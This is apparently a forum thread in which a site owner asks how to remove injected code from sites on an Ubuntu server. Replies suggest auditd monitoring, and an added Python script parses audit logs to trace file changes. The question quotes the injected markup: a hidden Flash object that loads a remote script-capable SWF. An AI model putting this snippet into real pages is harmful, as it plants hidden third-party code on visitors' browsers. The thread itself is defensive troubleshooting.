XSS Injection on my sites hosted with Ubuntu 14.04 x64 server

January 13, 2016 1.2k views
Security Nginx Ubuntu


I have a few sites hosted with Ubuntu 14.04 x64 on DigitalOcean,
and these sites have injected code like this:

<div id="qjlljnppwyng" style="position: absolute; top: 0px; left: 0px; width: 1px; height: 1px; z-index: 2147483647;">
<object type="application/x-shockwave-flash" id="_GPL_e6a00_swf" data="http://cdncache-a.akamaihd.net/items/e6a00/storage.swf?r=1" width="1" height="1">
<param name="wmode" value="transparent">
<param name="allowscriptaccess" value="always">
<param name="flashvars" value="logfn=_GPL.items.e6a00.log&amp;onload=_GPL.items.e6a00.onload&amp;onerror=_GPL.items.e6a00.onerror&amp;LSOName=gpl">

How can I fix it without reinstalling the server? Maybe someone has had the same problem?

  • If you removed the infected code, does it come back later? You may want to set up auditd to watch those files for changes and when/if they do change again, you can see what process/program has made the change.

    I've had a similar issue with a friend's website. It turns out one of the old FTP accounts (not in use anymore) was injecting the code and once the FTP account was disabled the issue stopped coming up.

    If it turns out the injection/change is being made by Apache itself (or the user if you're using mod_suexec or mod_suphp) then the website may have a PHP (or other) shell present or another vulnerability.

  • The infected code is gone; it seems like it was generated on the client side.
    In the website sources there is none of the infected code that was posted above.
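
The auditd suggestion in the first comment, as an added example (not code from the thread): with a watch rule on the web root, this groups raw audit.log records by event and reports which executable and user wrote each file. The watched path, the key name webroot-change and the sample records are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed watch rule (path and key name are placeholders for this example):
#   auditctl -w /var/www/html -p wa -k webroot-change
# Constructed sample of raw /var/log/audit/audit.log records, not real data.
SAMPLE_LOG = '''\
type=SYSCALL msg=audit(1452680000.123:4567): arch=c000003e syscall=2 success=yes exit=3 ppid=1201 pid=1302 auid=4294967295 uid=33 gid=33 comm="php5-fpm" exe="/usr/sbin/php5-fpm" key="webroot-change"
type=CWD msg=audit(1452680000.123:4567): cwd="/var/www/html"
type=PATH msg=audit(1452680000.123:4567): item=0 name="/var/www/html/index.php" inode=262154 nametype=NORMAL
type=SYSCALL msg=audit(1452683600.456:4590): arch=c000003e syscall=2 success=yes exit=4 ppid=2210 pid=2215 auid=1001 uid=1001 gid=1001 comm="vsftpd" exe="/usr/sbin/vsftpd" key="webroot-change"
type=PATH msg=audit(1452683600.456:4590): item=0 name="/var/www/html/footer.php" inode=262160 nametype=NORMAL
type=SYSCALL msg=audit(1452683700.000:4601): arch=c000003e syscall=2 success=yes exit=3 ppid=1 pid=900 auid=0 uid=0 gid=0 comm="logrotate" exe="/usr/sbin/logrotate" key="other-rule"
type=PATH msg=audit(1452683700.000:4601): item=0 name="/var/log/nginx/access.log" inode=131 nametype=NORMAL
'''

EVENT_ID = re.compile(r'msg=audit\((\d+\.\d+):(\d+)\)')
FIELD = re.compile(r'(\w+)=("[^"]*"|\S+)')

def parse_events(log_text):
    """Group records that share an audit event serial into one dict per event."""
    events = defaultdict(lambda: {"paths": []})
    for line in log_text.splitlines():
        m = EVENT_ID.search(line)
        if not m:
            continue
        fields = {k: v.strip('"') for k, v in FIELD.findall(line)}
        ev = events[m.group(2)]
        if fields.get("type") == "SYSCALL":
            ev.update(ts=float(m.group(1)), exe=fields.get("exe"),
                      uid=fields.get("uid"), auid=fields.get("auid"),
                      key=fields.get("key"))
        elif fields.get("type") == "PATH":
            ev["paths"].append(fields.get("name"))
    return events

def writers_for_key(log_text, key):
    """Return (path, exe, uid, auid) for every event tagged with the watch key."""
    hits = []
    for ev in parse_events(log_text).values():
        if ev.get("key") == key:
            hits.extend((p, ev["exe"], ev["uid"], ev["auid"]) for p in ev["paths"])
    return sorted(hits)

if __name__ == "__main__":
    for path, exe, uid, auid in writers_for_key(SAMPLE_LOG, "webroot-change"):
        print(f"{path} modified by {exe} (uid={uid}, login uid={auid})")
```

An auid of 4294967295 means no login session is attached (a daemon such as the PHP worker), while a real auid points at an interactive or FTP login.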
